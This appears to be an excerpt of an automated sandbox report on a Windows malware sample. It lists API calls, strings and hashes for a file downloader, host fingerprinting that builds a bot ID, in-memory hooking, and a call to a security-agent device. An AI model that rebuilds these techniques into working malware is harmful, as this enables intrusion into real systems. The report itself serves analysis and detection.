                                                                                                                                                                                                            control_flow_graph 1191 2c83a35-2c83a3c 1192 2c83a40-2c83a51 1191->1192 1193 2c83a53 1192->1193 1194 2c83a55-2c83a5c 1192->1194 1193->1194 1194->1192 1195 2c83a5e-2c83a8b call 2c86c40 InternetOpenA 1194->1195 1198 2c83d4d-2c83d4f 1195->1198 1199 2c83a91-2c83aac InternetConnectA 1195->1199 1202 2c83d7f-2c83d87 1198->1202 1203 2c83d51-2c83d7c call 2c83620 1198->1203 1200 2c83ab2-2c83abb 1199->1200 1201 2c83d43-2c83d4a InternetCloseHandle 1199->1201 1204 2c83abd 1200->1204 1205 2c83ac2-2c83ae2 HttpOpenRequestA 1200->1205 1201->1198 1204->1205 1207 2c83ae8-2c83af6 1205->1207 1208 2c83d39-2c83d40 InternetCloseHandle 1205->1208 1210 2c83af8-2c83afc 1207->1210 1211 2c83b0d-2c83b20 HttpAddRequestHeadersA 1207->1211 1208->1201 1210->1211 1214 2c83afe-2c83b0b HttpAddRequestHeadersA 1210->1214 1212 2c83b52-2c83b67 HttpSendRequestA 1211->1212 1213 2c83b22-2c83b50 _snprintf HttpAddRequestHeadersA 1211->1213 1215 2c83d2c-2c83d36 InternetCloseHandle 1212->1215 1216 2c83b6d-2c83b87 HttpQueryInfoA 1212->1216 1213->1212 1214->1211 1215->1208 1216->1215 1217 2c83b8d-2c83b94 1216->1217 1217->1215 1218 2c83b9a-2c83bbe CreateFileA 1217->1218 1218->1215 1219 2c83bc4-2c83bca 1218->1219 1220 2c83bd0-2c83be4 GetProcessHeap RtlAllocateHeap 1219->1220 1221 2c83bea-2c83c17 memset InternetReadFile 1220->1221 1222 2c83c73-2c83c75 1220->1222 1225 2c83c19-2c83c1e 1221->1225 1226 2c83c57-2c83c65 GetProcessHeap HeapValidate 1221->1226 1223 2c83c9a-2c83cac call 2c76570 1222->1223 1224 2c83c77-2c83c8b GetHandleInformation 1222->1224 1234 2c83d29 1223->1234 1235 2c83cb2-2c83cbc 1223->1235 1224->1223 1228 2c83c8d-2c83c91 1224->1228 1225->1226 1230 2c83c20-2c83c44 WriteFile GetProcessHeap HeapValidate 1225->1230 1226->1222 1227 2c83c67-2c83c6d GetProcessHeap HeapFree 1226->1227 1227->1222 1228->1223 1231 2c83c93-2c83c94 CloseHandle 1228->1231 1230->1220 1233 2c83c46-2c83c52 GetProcessHeap HeapFree 1230->1233 1231->1223 1233->1220 1234->1215 1236 2c83cc0-2c83cce 1235->1236 1236->1236 1237 2c83cd0 1236->1237 1238 2c83cd2-2c83ce3 1237->1238 1239 2c83ce5 1238->1239 1240 2c83ce7-2c83cee 1238->1240 1239->1240 1240->1238 1241 2c83cf0-2c83d1b call 2c86c40 call 2c764d0 GetProcessHeap HeapValidate 1240->1241 1241->1234 1246 2c83d1d-2c83d23 GetProcessHeap RtlFreeHeap 1241->1246 1246->1234
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C83D10
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83D13
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83D20
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 02C83D23
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83D2D
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83D3A
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83D44
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83B22
                                                                                                                                                                                                            • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                            • GET, xrefs: 02C83AB6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocateConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: 3abfb9076ff185e9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                            • API String ID: 4276495747-2068853992
                                                                                                                                                                                                            • Opcode ID: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
                                                                                                                                                                                                            • Instruction ID: 03b87ba596479fec21a927c15e461ff520d988b86805412e4964db04f359d503
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8951B771A802847BEB219F50CC49FEB7B68EF84B18F104698FA05B71C0D7B0AA55CB65
                                                                                                                                                                                                            Function 02C83695 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 173memorynetworkfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1247 2c83695-2c8369c 1248 2c836a0-2c836b1 1247->1248 1249 2c836b3 1248->1249 1250 2c836b5-2c836bc 1248->1250 1249->1250 1250->1248 1251 2c836be-2c836ee call 2c86c40 InternetOpenA 1250->1251 1254 2c839ad-2c839b5 1251->1254 1255 2c836f4-2c8370c InternetConnectA 1251->1255 1256 2c8398f-2c8399f InternetCloseHandle 1255->1256 1257 2c83712-2c8371a 1255->1257 1258 2c8371c 1257->1258 1259 2c83721-2c8373e HttpOpenRequestA 1257->1259 1258->1259 1260 2c83744-2c8374e 1259->1260 1261 2c83985-2c8398c InternetCloseHandle 1259->1261 1262 2c83750-2c83753 1260->1262 1263 2c83764-2c83776 HttpAddRequestHeadersA 1260->1263 1261->1256 1262->1263 1264 2c83755-2c83762 HttpAddRequestHeadersA 1262->1264 1265 2c837a8-2c837bb HttpSendRequestA 1263->1265 1266 2c83778-2c837a6 _snprintf HttpAddRequestHeadersA 1263->1266 1264->1263 1267 2c8397b-2c83982 InternetCloseHandle 1265->1267 1268 2c837c1-2c837db HttpQueryInfoA 1265->1268 1266->1265 1267->1261 1268->1267 1269 2c837e1-2c837e8 1268->1269 1269->1267 1270 2c837ee-2c83814 CreateFileA 1269->1270 1270->1267 1271 2c8381a 1270->1271 1272 2c83820-2c83834 GetProcessHeap HeapAlloc 1271->1272 1273 2c8383a-2c83867 memset InternetReadFile 1272->1273 1274 2c838c3-2c838c5 1272->1274 1275 2c83869-2c8386e 1273->1275 1276 2c838a7-2c838b5 GetProcessHeap HeapValidate 1273->1276 1277 2c838ea-2c838fe call 2c76570 1274->1277 1278 2c838c7-2c838db GetHandleInformation 1274->1278 1275->1276 1281 2c83870-2c83894 WriteFile GetProcessHeap HeapValidate 1275->1281 1276->1274 1282 2c838b7-2c838bd GetProcessHeap HeapFree 1276->1282 1286 2c83978 1277->1286 1287 2c83900-2c8390a 1277->1287 1278->1277 1279 2c838dd-2c838e1 1278->1279 1279->1277 1283 2c838e3-2c838e4 CloseHandle 1279->1283 1281->1272 1285 2c83896-2c838a2 GetProcessHeap HeapFree 1281->1285 1282->1274 1283->1277 1285->1272 1286->1267 1288 2c83910-2c8391e 1287->1288 1288->1288 1289 2c83920 1288->1289 1290 2c83922-2c83933 1289->1290 1291 2c83935 1290->1291 1292 2c83937-2c8393e 1290->1292 1291->1292 1292->1290 1293 2c83940-2c8396a call 2c86c40 call 2c764d0 GetProcessHeap HeapValidate 1292->1293 1293->1286 1298 2c8396c-2c83972 GetProcessHeap HeapFree 1293->1298 1298->1286
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02C8395F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83962
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8396F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83972
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C8397C
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83986
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83990
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83778
                                                                                                                                                                                                            • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                            • GET, xrefs: 02C83712
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: 3abfb9076ff185e9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                            • API String ID: 4235660723-2068853992
                                                                                                                                                                                                            • Opcode ID: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                            • Instruction ID: 14c700ebed10ca15fb36dad9405ebaab1b16be7677af05c9bd8b66d4237764b5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5351A7719402847BEB219F54DC89FFB776CEF88B58F008658F905A71C0D7709A55CBA1
                                                                                                                                                                                                            Function 02C73100 Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 181memoryregistryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C73126
                                                                                                                                                                                                              • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
                                                                                                                                                                                                              • Part of subcall function 02C934A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                              • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                              • Part of subcall function 02C934A0: StrChrIA.SHLWAPI(?,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                              • Part of subcall function 02C934A0: lstrcpynA.KERNEL32(7744C3F0,00000001,00000104,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                              • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C935D4
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C935E3
                                                                                                                                                                                                              • Part of subcall function 02C935A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C935EA
                                                                                                                                                                                                              • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C93602
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93619
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9361F
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93640
                                                                                                                                                                                                              • Part of subcall function 02C935A0: StrChrIA.SHLWAPI(?,?,00000000,00000000,?,?,?,?,00000000), ref: 02C93667
                                                                                                                                                                                                              • Part of subcall function 02C935A0: lstrcpynA.KERNEL32(00000000,00000001,00000104,?,00000000,00000000,?,?,?,?,00000000), ref: 02C9367B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,75572F70,7744C3F0), ref: 02C73164
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,?,75572F70,7744C3F0), ref: 02C73171
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,75572F70,7744C3F0), ref: 02C73188
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,75572F70,7744C3F0), ref: 02C731AE
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,02C8598D,?,?,?,75572F70,7744C3F0), ref: 02C731CF
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,75572F70,7744C3F0), ref: 02C731D9
                                                                                                                                                                                                            • CharUpperA.USER32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C731F4
                                                                                                                                                                                                            • CharUpperA.USER32(00000000,00000000,?,?,75572F70,7744C3F0), ref: 02C731F8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73210
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7326F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,75572F70,7744C3F0), ref: 02C7329E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732A7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C732B3
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732B6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C732C6
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732C9
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C732D5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732D8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$memset$Name$AllocCharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$BackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                            • String ID: %02X$%48%55%42%45%52%54%21%39%36%35%35%34%33%21%30%39%43%30%36%36%38%33$%s!%s!%08X$user!965543!09C06683$InstallDate$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                            • API String ID: 2057876665-3509500721
                                                                                                                                                                                                            • Opcode ID: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                            • Instruction ID: 75e312b9e7ffe3699f6f3bebc38541af77f4571995b644781dfedd3aa8380b83
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A51C6B1E40295ABDB11CBA59C89FEBBBBCEF84704F0445D5E905E7141E7709A048BA0
                                                                                                                                                                                                            Function 02C88DD0 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88DF6
                                                                                                                                                                                                            • GetThreadPriority.KERNEL32(00000000,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88DFD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C88E06
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02C890E0,00000008,00000040,?,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C88E27
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02C88E46
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02C88E62
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02C88E78
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02C88E86
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88E91
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02C88EA4
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02C88EB5
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02C88EC4
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02C88ED3
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02C88EE2
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000006,?), ref: 02C88EEA
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02C88EFD
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02C88F0E
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02C88F1D
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88F29
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02C88F33
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88F3B
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02C88F42
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2984368831-0
                                                                                                                                                                                                            • Opcode ID: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                            • Instruction ID: f67128f16ff17653a9e34e1d7b9161699e35eac166b0b198bcee514057c584d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13517371941219EFE711AF74CC46FAE77ACFF49310F154928F986E3180DB3899518BA0
                                                                                                                                                                                                            Function 004020B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
